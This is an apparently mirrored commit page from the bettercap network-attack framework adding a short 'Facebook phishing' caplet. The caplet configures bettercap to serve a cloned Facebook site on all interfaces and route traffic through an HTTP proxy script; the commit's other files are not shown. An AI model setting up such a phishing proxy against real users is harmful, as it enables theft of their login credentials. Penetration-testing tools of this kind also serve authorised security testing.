mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 10:46:57 -07:00
new: facebook phishing caplet
This commit is contained in:
parent
3bd3c7fb2a
commit
2fc4bf6125
6 changed files with 365 additions and 1 deletions
7
caplets/fb-phish.cap
Normal file
7
caplets/fb-phish.cap
Normal file
|
@ -0,0 +1,7 @@
|
|||
set http.server.address 0.0.0.0
|
||||
set http.server.path caplets/www/www.facebook.com/
|
||||
|
||||
set http.proxy.script caplets/fb-phish.js
|
||||
|
||||
http.proxy on
|
||||
http.server on
|
Loading…
Add table
Add a link
Reference in a new issue